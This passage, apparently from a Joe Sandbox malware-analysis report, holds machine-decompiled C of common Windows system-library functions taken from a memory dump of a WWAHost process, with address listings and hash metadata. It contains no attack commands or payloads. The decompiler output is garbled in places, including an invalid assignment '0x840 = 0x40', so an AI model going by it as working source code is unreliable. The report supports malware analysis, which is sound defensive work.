				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3a47b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0396CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03972280( *[fs:0x30], 0x3a48550);
						_t139 =  *0x3a47b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0398F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0396FFB0(_t193, _t235, 0x3a48550);
								L5:
								return E039AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03951C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3a47b9c; // 0x0
							_t235 = L03974620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3a47b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0398A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0396FFB0(_t193, _t235, 0x3a48550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L039777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L039777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3a47b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3a47b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E039937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3a47b9c; // 0x0
									_t214 = L03974620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E039937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3a47b10 =  *0x3a47b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3a47b04 =  *0x3a47b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L039777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L039777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3a47b08 =  *0x3a47b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E039957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0399F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L039777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0398A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L039777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E039996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                              0x0396849b
                                              0x0396849b
                                              0x0396849b
                                              0x0396849b
                                              0x0396849d
                                              0x039684a2
                                              0x039684a7
                                              0x039684b1
                                              0x039684d8
                                              0x00000000
                                              0x039684b3
                                              0x039684c4
                                              0x039684c9
                                              0x039684cd
                                              0x039684cf
                                              0x039684cf
                                              0x039684d6
                                              0x039684e6
                                              0x039684e9
                                              0x039684ec
                                              0x039684ef
                                              0x039684f2
                                              0x039684f4
                                              0x039684fc
                                              0x03968501
                                              0x03968506
                                              0x03968509
                                              0x039686e0
                                              0x039686e5
                                              0x039686e8
                                              0x039686ed
                                              0x039686f0
                                              0x039686f2
                                              0x039b9afd
                                              0x039b9b02
                                              0x039684da
                                              0x039684df
                                              0x039684df
                                              0x039686fa
                                              0x039686fd
                                              0x039686fe
                                              0x03968701
                                              0x03968706
                                              0x03968709
                                              0x0396870b
                                              0x00000000
                                              0x00000000
                                              0x03968711
                                              0x03968725
                                              0x03968727
                                              0x0396872a
                                              0x0396872c
                                              0x039b9af0
                                              0x039b9af5
                                              0x03968732
                                              0x03968732
                                              0x03968732
                                              0x03968735
                                              0x03968737
                                              0x03968515
                                              0x03968515
                                              0x03968518
                                              0x0396851d
                                              0x03968523
                                              0x03968527
                                              0x0396852b
                                              0x03968537
                                              0x03968539
                                              0x0396853c
                                              0x0396853e
                                              0x0396868c
                                              0x03968691
                                              0x03968699
                                              0x0396869b
                                              0x03968744
                                              0x03968748
                                              0x039686a1
                                              0x039686a1
                                              0x039686a1
                                              0x039686a4
                                              0x039686a8
                                              0x039b9bdf
                                              0x039b9bdf
                                              0x039686ae
                                              0x039686b0
                                              0x00000000
                                              0x039686b6
                                              0x00000000
                                              0x039b9be9
                                              0x039686b0
                                              0x03968544
                                              0x0396854a
                                              0x0396854d
                                              0x03968551
                                              0x0396876e
                                              0x03968778
                                              0x0396877b
                                              0x03968780
                                              0x03968557
                                              0x03968557
                                              0x0396855d
                                              0x0396855d
                                              0x0396856b
                                              0x0396856e
                                              0x03968570
                                              0x03968573
                                              0x03968576
                                              0x03968576
                                              0x03968579
                                              0x0396857b
                                              0x00000000
                                              0x00000000
                                              0x03968581
                                              0x039685a0
                                              0x039685a2
                                              0x039685a5
                                              0x039685a7
                                              0x039b9b1b
                                              0x039b9b1b
                                              0x0396862e
                                              0x0396862e
                                              0x03968631
                                              0x03968631
                                              0x03968634
                                              0x03968636
                                              0x03968669
                                              0x03968669
                                              0x0396866b
                                              0x039b9bbf
                                              0x039b9bc4
                                              0x039b9bc8
                                              0x039b9bce
                                              0x039b9bce
                                              0x03968671
                                              0x03968671
                                              0x03968674
                                              0x03968676
                                              0x039b9bae
                                              0x039b9bae
                                              0x03968676
                                              0x0396867c
                                              0x0396867e
                                              0x03968688
                                              0x03968688
                                              0x00000000
                                              0x0396867e
                                              0x03968638
                                              0x03968638
                                              0x0396863b
                                              0x0396863e
                                              0x0396863f
                                              0x03968642
                                              0x03968645
                                              0x03968648
                                              0x0396864d
                                              0x039b9b69
                                              0x039b9b6e
                                              0x039b9b7b
                                              0x039b9b81
                                              0x039b9b85
                                              0x039b9b89
                                              0x039b9ba7
                                              0x039b9b8b
                                              0x039b9b91
                                              0x039b9b9a
                                              0x039b9b9f
                                              0x039b9b9f
                                              0x03968788
                                              0x0396878d
                                              0x03968763
                                              0x03968763
                                              0x03968766
                                              0x00000000
                                              0x03968766
                                              0x039b9b70
                                              0x00000000
                                              0x039b9b70
                                              0x03968656
                                              0x0396865a
                                              0x0396865c
                                              0x03968752
                                              0x03968756
                                              0x00000000
                                              0x00000000
                                              0x0396875e
                                              0x00000000
                                              0x0396875e
                                              0x03968662
                                              0x03968662
                                              0x03968662
                                              0x03968666
                                              0x00000000
                                              0x03968666
                                              0x039685b7
                                              0x039685b9
                                              0x039685bc
                                              0x039685bf
                                              0x039685cc
                                              0x039685d1
                                              0x039685d4
                                              0x039685db
                                              0x039685de
                                              0x039685e0
                                              0x039b9b5f
                                              0x00000000
                                              0x039b9b5f
                                              0x039685e6
                                              0x039685ea
                                              0x039686c3
                                              0x039686c5
                                              0x039686c8
                                              0x039686ca
                                              0x039b9b16
                                              0x00000000
                                              0x039b9b16
                                              0x039686d6
                                              0x039685f6
                                              0x039685f6
                                              0x039685f9
                                              0x03968602
                                              0x03968606
                                              0x0396860a
                                              0x0396860b
                                              0x0396860e
                                              0x03968611
                                              0x00000000
                                              0x03968611
                                              0x039685f3
                                              0x00000000
                                              0x039685f3
                                              0x03968619
                                              0x0396861e
                                              0x0396861e
                                              0x03968621
                                              0x03968622
                                              0x03968623
                                              0x03968625
                                              0x0396862c
                                              0x00000000
                                              0x0396873d
                                              0x00000000
                                              0x0396873d
                                              0x03968737
                                              0x0396850f
                                              0x03968512
                                              0x00000000
                                              0x03968512
                                              0x00000000
                                              0x039684d6

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3467978bec567979327d4eef9428eaa82d51da27bd6c2d54636fbfbf6cb173c9
                                              • Instruction ID: 7adc634a5446b70450801ea38d07fce13e00dc7db7fa326df3c8fc642320a88c
                                              • Opcode Fuzzy Hash: 3467978bec567979327d4eef9428eaa82d51da27bd6c2d54636fbfbf6cb173c9
                                              • Instruction Fuzzy Hash: 6EB19DB4E05359DFDB14EFA8C980AADFBB9FF88304F14452AE506AB245D771A842CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398513A Relevance: .3, Instructions: 258COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E0398513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3a4d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0399D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03972280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03974620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0399F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0396FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x3a4b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0399B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                              0x03985142
                                              0x0398514c
                                              0x03985150
                                              0x03985157
                                              0x03985159
                                              0x0398515e
                                              0x03985165
                                              0x03985169
                                              0x0398516c
                                              0x03985172
                                              0x03985176
                                              0x0398517a
                                              0x0398517a
                                              0x0398517a
                                              0x0398517f
                                              0x039c6d8b
                                              0x039c6d8e
                                              0x039c6d91
                                              0x039c6d95
                                              0x039c6d98
                                              0x039c6d9c
                                              0x039c6da0
                                              0x039c6da3
                                              0x039c6da7
                                              0x039c6e26
                                              0x039c6e26
                                              0x039c6e2a
                                              0x039851f9
                                              0x039851f9
                                              0x039851fe
                                              0x039c6e33
                                              0x039c6e33
                                              0x039c6e39
                                              0x039c6e3d
                                              0x039c6e46
                                              0x039c6e50
                                              0x00000000
                                              0x00000000
                                              0x039c6e52
                                              0x039c6e53
                                              0x039c6e56
                                              0x039c6e5d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c6e5f
                                              0x039c6e67
                                              0x039c6e77
                                              0x039c6e7f
                                              0x039c6e80
                                              0x039c6e88
                                              0x039c6e90
                                              0x039c6e9f
                                              0x039c6ea5
                                              0x039c6ea9
                                              0x039c6eb1
                                              0x039c6ebf
                                              0x00000000
                                              0x00000000
                                              0x039c6ecf
                                              0x039c6ed3
                                              0x00000000
                                              0x00000000
                                              0x039c6edb
                                              0x039c6ede
                                              0x039c6ee1
                                              0x039c6ee8
                                              0x039c6eeb
                                              0x039c6eed
                                              0x039c6ef0
                                              0x039c6ef4
                                              0x039c6ef8
                                              0x039c6efc
                                              0x00000000
                                              0x00000000
                                              0x039c6f0d
                                              0x039c6f11
                                              0x039c6f32
                                              0x039c6f37
                                              0x039c6f3b
                                              0x039c6f3e
                                              0x039c6f41
                                              0x039c6f46
                                              0x00000000
                                              0x00000000
                                              0x039c6f4c
                                              0x039c6f50
                                              0x039c6f50
                                              0x039c6f54
                                              0x039c6f62
                                              0x039c6f65
                                              0x039c6f6d
                                              0x039c6f7b
                                              0x039c6f7b
                                              0x039c6f93
                                              0x039c6f98
                                              0x039c6fa0
                                              0x039c6fa6
                                              0x039c6fb3
                                              0x039c6fb6
                                              0x039c6fbf
                                              0x039c6fc1
                                              0x039c6fd5
                                              0x039c6fda
                                              0x039c6fda
                                              0x039c6fdd
                                              0x039c6fe2
                                              0x039c6fe7
                                              0x039c6feb
                                              0x039c6fef
                                              0x039c6ff3
                                              0x0398520c
                                              0x0398520c
                                              0x0398520f
                                              0x03985215
                                              0x03985234
                                              0x0398523a
                                              0x0398523a
                                              0x03985244
                                              0x03985245
                                              0x03985246
                                              0x03985251
                                              0x03985251
                                              0x039c6f13
                                              0x039c6f17
                                              0x039c6f17
                                              0x039c6f18
                                              0x039c6f1b
                                              0x039c6f1f
                                              0x039c6f23
                                              0x00000000
                                              0x039c6f28
                                              0x03985204
                                              0x03985204
                                              0x03985208
                                              0x00000000
                                              0x03985208
                                              0x03985185
                                              0x03985188
                                              0x0398518a
                                              0x0398518e
                                              0x03985195
                                              0x039c6db1
                                              0x039c6db5
                                              0x039c6db9
                                              0x0398519b
                                              0x0398519b
                                              0x0398519e
                                              0x039851a7
                                              0x039851a9
                                              0x039851a9
                                              0x039851b5
                                              0x039851b8
                                              0x039851bb
                                              0x039851be
                                              0x039851c1
                                              0x039851c5
                                              0x039851c9
                                              0x039851cd
                                              0x039851cd
                                              0x039851d8
                                              0x039851dc
                                              0x039851e0
                                              0x039c6dcc
                                              0x039c6dd0
                                              0x039c6dd5
                                              0x039c6ddd
                                              0x039c6de1
                                              0x039c6de1
                                              0x039c6de5
                                              0x039c6deb
                                              0x039c6df1
                                              0x039c6df7
                                              0x039c6dfd
                                              0x039c6e01
                                              0x039c6e05
                                              0x039c6e09
                                              0x039c6e0d
                                              0x039c6e11
                                              0x039c6e11
                                              0x039851eb
                                              0x039c6e1a
                                              0x039c6e1f
                                              0x039c6e21
                                              0x039c6e23
                                              0x00000000
                                              0x039851f1
                                              0x039851f1
                                              0x00000000
                                              0x039851f1

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b849721599fe4776884c17da7c6fe7733b6a3e3c843a8eee0c789027a12b6b3
                                              • Instruction ID: c2f9be094b0dc0272205b4b8ad909e4324472bea0b09f5e8abdbed05eaf579ce
                                              • Opcode Fuzzy Hash: 4b849721599fe4776884c17da7c6fe7733b6a3e3c843a8eee0c789027a12b6b3
                                              • Instruction Fuzzy Hash: F2C121755083809FD354CF28C580A6AFBF1BF89344F188A6EF8998B392D771E945CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039803E2 Relevance: .3, Instructions: 254COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E039803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x3a4d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03980548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0399B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0396B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3a47c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03977D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03977D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E039D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03999830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E039D69A6(_t119, __eflags);
